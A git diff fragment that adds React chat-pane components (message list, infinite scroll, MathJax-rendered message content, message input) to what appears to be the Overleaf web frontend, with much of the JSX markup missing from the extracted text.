+document.querySelectorAll('[data-ol-bookmarkable-tab]').forEach(bookmarkableTab) +window.addEventListener('hashchange', handleHashChange) +handleHashChange() diff --git a/services/web/frontend/js/features/chat/components/chat-fallback-error.tsx b/services/web/frontend/js/features/chat/components/chat-fallback-error.tsx new file mode 100644 index 0000000..b572722 --- /dev/null +++ b/services/web/frontend/js/features/chat/components/chat-fallback-error.tsx @@ -0,0 +1,28 @@ +import { useTranslation } from 'react-i18next' +import OLNotification from '@/features/ui/components/ol/ol-notification' +import OLButton from '@/features/ui/components/ol/ol-button' + +interface ChatFallbackErrorProps { + reconnect?: () => void +} + +function ChatFallbackError({ reconnect }: ChatFallbackErrorProps) { + const { t } = useTranslation() + + return ( + + ) +} + +export default ChatFallbackError diff --git a/services/web/frontend/js/features/chat/components/chat-pane.tsx b/services/web/frontend/js/features/chat/components/chat-pane.tsx new file mode 100644 index 0000000..d510377 --- /dev/null +++ b/services/web/frontend/js/features/chat/components/chat-pane.tsx @@ -0,0 +1,117 @@ +import React, { lazy, Suspense, useEffect, useState } from 'react' +import { useTranslation } from 'react-i18next' + +import MessageInput from './message-input' +import InfiniteScroll from './infinite-scroll' +import ChatFallbackError from './chat-fallback-error' +import { useLayoutContext } from '../../../shared/context/layout-context' +import { useUserContext } from '../../../shared/context/user-context' +import withErrorBoundary from '../../../infrastructure/error-boundary' +import { FetchError } from '../../../infrastructure/fetch-json' +import { useChatContext } from '../context/chat-context' +import { FullSizeLoadingSpinner } from '../../../shared/components/loading-spinner' +import MaterialIcon from '@/shared/components/material-icon' + +const MessageList = lazy(() => import('./message-list')) + +const Loading = () => + +const ChatPane = React.memo(function ChatPane() { + const { t } = useTranslation() + + const { chatIsOpen } = useLayoutContext() + const user = useUserContext() + + const { + status, + messages, + initialMessagesLoaded, + atEnd, + loadInitialMessages, + loadMoreMessages, + reset, + sendMessage, + markMessagesAsRead, + error, + } = useChatContext() + + useEffect(() => { + if (chatIsOpen && !initialMessagesLoaded) { + loadInitialMessages() + } + }, [chatIsOpen, loadInitialMessages, initialMessagesLoaded]) + + const shouldDisplayPlaceholder = status !== 'pending' && messages.length === 0 + + const messageContentCount = messages.reduce( + (acc, { contents }) => acc + contents.length, + 0 + ) + + // Keep the chat pane in the DOM to avoid resetting the form input and re-rendering MathJax content. + const [chatOpenedOnce, setChatOpenedOnce] = useState(chatIsOpen) + useEffect(() => { + if (chatIsOpen) { + setChatOpenedOnce(true) + } + }, [chatIsOpen]) + + if (error) { + // let user try recover from fetch errors + if (error instanceof FetchError) { + return + } + throw error + } + + if (!user) { + return null + } + if (!chatOpenedOnce) { + return null + } + + return ( + + ) +}) + +function Placeholder() { + const { t } = useTranslation() + return ( + <> +
    {t('no_messages')}
    +
    + {t('send_first_message')} +
    + +
    + + ) +} + +export default withErrorBoundary(ChatPane, ChatFallbackError) diff --git a/services/web/frontend/js/features/chat/components/infinite-scroll.tsx b/services/web/frontend/js/features/chat/components/infinite-scroll.tsx new file mode 100644 index 0000000..9de0ed9 --- /dev/null +++ b/services/web/frontend/js/features/chat/components/infinite-scroll.tsx @@ -0,0 +1,95 @@ +import { useRef, useEffect, useLayoutEffect } from 'react' +import _ from 'lodash' + +const SCROLL_END_OFFSET = 30 + +interface InfiniteScrollProps { + atEnd?: boolean + children: React.ReactElement + className?: string + fetchData(): void + itemCount: number + isLoading?: boolean +} + +function InfiniteScroll({ + atEnd, + children, + className = '', + fetchData, + itemCount, + isLoading, +}: InfiniteScrollProps) { + const root = useRef(null) + + // we keep the value in a Ref instead of state so it can be safely used in effects + const scrollBottomRef = useRef(0) + function setScrollBottom(value: number) { + scrollBottomRef.current = value + } + + function updateScrollPosition() { + if (root.current) { + root.current.scrollTop = + root.current.scrollHeight - + root.current.clientHeight - + scrollBottomRef.current + } + } + + // Repositions the scroll after new items are loaded + useLayoutEffect(updateScrollPosition, [itemCount]) + + // Repositions the scroll after a window resize + useEffect(() => { + const handleResize = _.debounce(updateScrollPosition, 400) + window.addEventListener('resize', handleResize) + return () => { + window.removeEventListener('resize', handleResize) + } + }, []) + + function onScrollHandler(event: React.UIEvent) { + if (root.current) { + setScrollBottom( + root.current.scrollHeight - + root.current.scrollTop - + root.current.clientHeight + ) + + if (event.target !== event.currentTarget) { + // Ignore scroll events on nested divs + // (this check won't be necessary in React 17: https://github.com/facebook/react/issues/15723 + return + } + if (shouldFetchData()) { + fetchData() + } + } + } + + function shouldFetchData() { + if (!root.current) { + return false + } + const containerIsLargerThanContent = + root.current.children[0].clientHeight < root.current.clientHeight + if (atEnd || isLoading || containerIsLargerThanContent) { + return false + } else { + return root.current.scrollTop < SCROLL_END_OFFSET + } + } + + return ( +
    + {children} +
    + ) +} + +export default InfiniteScroll diff --git a/services/web/frontend/js/features/chat/components/message-content.tsx b/services/web/frontend/js/features/chat/components/message-content.tsx new file mode 100644 index 0000000..ad2e6a6 --- /dev/null +++ b/services/web/frontend/js/features/chat/components/message-content.tsx @@ -0,0 +1,43 @@ +import { useRef, useEffect, type FC } from 'react' +import Linkify from 'react-linkify' +import useIsMounted from '../../../shared/hooks/use-is-mounted' +import { loadMathJax } from '../../mathjax/load-mathjax' +import { debugConsole } from '@/utils/debugging' + +const MessageContent: FC<{ content: string }> = ({ content }) => { + const root = useRef(null) + const mounted = useIsMounted() + + useEffect(() => { + if (root.current) { + // adds attributes to all the links generated by , required due to https://github.com/tasti/react-linkify/issues/99 + for (const a of root.current.getElementsByTagName('a')) { + a.setAttribute('target', '_blank') + a.setAttribute('rel', 'noreferrer noopener') + } + + // MathJax v3 typesetting + loadMathJax() + .then(async MathJax => { + if (mounted.current) { + const element = root.current + try { + await MathJax.typesetPromise([element]) + MathJax.typesetClear([element]) + } catch (error) { + debugConsole.error(error) + } + } + }) + .catch(debugConsole.error) + } + }, [content, mounted]) + + return ( +

    + {content} +

    + ) +} + +export default MessageContent diff --git a/services/web/frontend/js/features/chat/components/message-input.tsx b/services/web/frontend/js/features/chat/components/message-input.tsx new file mode 100644 index 0000000..b0c2312 --- /dev/null +++ b/services/web/frontend/js/features/chat/components/message-input.tsx @@ -0,0 +1,42 @@ +import { useTranslation } from 'react-i18next' + +type MessageInputProps = { + resetUnreadMessages: () => void + sendMessage: (message: string) => void +} + +function MessageInput({ resetUnreadMessages, sendMessage }: MessageInputProps) { + const { t } = useTranslation() + + function handleKeyDown(event: React.KeyboardEvent) { + const selectingCharacter = event.nativeEvent.isComposing + if (event.key === 'Enter' && !selectingCharacter) { + event.preventDefault() + const target = event.target as HTMLInputElement + sendMessage(target.value) + // wrap the form reset in setTimeout so input sources have time to finish + // https://github.com/overleaf/internal/pull/9206 + window.setTimeout(() => { + target.blur() + target.closest('form')?.reset() + target.focus() + }, 0) + } + } + + return ( +
    + +